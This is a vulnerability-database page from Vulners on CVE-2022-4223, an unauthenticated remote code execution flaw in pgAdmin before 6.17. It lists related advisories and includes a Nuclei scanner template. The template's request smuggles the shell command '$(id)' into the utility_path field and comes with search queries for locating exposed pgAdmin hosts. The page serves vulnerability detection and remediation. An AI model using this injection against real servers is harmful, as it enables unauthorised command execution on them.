Vulners
Lucene search
pgAdmin < 6.17 - Unauthenticated Remote Code Execution
| Reporter | Title | Published | Views | Family All 23 |
|---|---|---|---|---|
 | The vulnerability of the pgAdmin 4 database management tool, related to the lack of authentication, allows a hacker to bypass the authentication checks and execute arbitrary code. | 23 Apr 202500:00 | – | bdu_fstec |
 | CVE-2022-4223 | 13 Dec 202218:27 | – | circl |
 | pgAdmin 代码注入漏洞 | 13 Dec 202200:00 | – | cnnvd |
 | pgAdmin 4 Remote Code Execution Vulnerability | 8 Dec 202200:00 | – | cnvd |
 | CVE-2022-4223 | 13 Dec 202200:00 | – | cve |
 | CVE-2022-4223 | 13 Dec 202200:00 | – | cvelist |
 | [SECURITY] Fedora 37 Update: pgadmin4-6.17-2.fc37 | 18 Dec 202201:41 | – | fedora |
 | Fedora 37 : pgadmin4 (2022-2d5a6f48e1) | 14 Nov 202400:00 | – | nessus |
 | pgadmin4 vulnerable to Code Injection | 13 Dec 202218:30 | – | github |
 | CVE-2022-4223 | 13 Dec 202216:15 | – | nvd |
10
id: CVE-2022-4223
info:
name: pgAdmin < 6.17 - Unauthenticated Remote Code Execution
author: 0x_Akoko
severity: critical
description: |
pgAdmin prior to 6.17 contains an insecure HTTP API caused by improper access control, letting unauthenticated users execute arbitrary external utilities via path manipulation, exploit requires no authentication.
impact: |
Attackers can execute arbitrary external utilities on the server, potentially leading to remote code execution or system compromise.
remediation: |
Update to version 6.17 or later to fix the security issue.
reference:
- https://github.com/advisories/GHSA-3v6v-2x6p-32mc
- https://nvd.nist.gov/vuln/detail/CVE-2022-4223
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-4223
epss-score: 0.79933
epss-percentile: 0.99562
cwe-id: CWE-94,CWE-862
metadata:
verified: true
max-request: 2
shodan-query: http.title:"pgAdmin"
fofa-query: title="pgAdmin"
tags: cve,cve2022,pgadmin,rce,unauth
flow: http(1) && http(2)
http:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: csrf
part: body
group: 1
regex:
- 'name="csrf_token"[^>]*value="([^"]+)"'
internal: true
- raw:
- |
POST /misc/validate_binary_path HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
X-pgA-CSRFToken: {{csrf}}
Referer: {{RootURL}}/browser/
{"utility_path":"/tmp/$(id)"}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "uid=", "gid=")'
condition: and
extractors:
- type: regex
part: body
regex:
- 'uid=[0-9]+\([a-zA-Z0-9_-]+\)\s*gid=[0-9]+\([a-zA-Z0-9_-]+\)'
# digest: 4a0a004730450220111e5c69e001736582663bd2ec5fbdcc046a9047e6b8f2c71f06acb246bafe77022100fcca3720e6f7cac3a413111592573a4c0a2627bbba81e4359ef949bf7db14fe4:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 3.18.8
EPSS0.79933
SSVC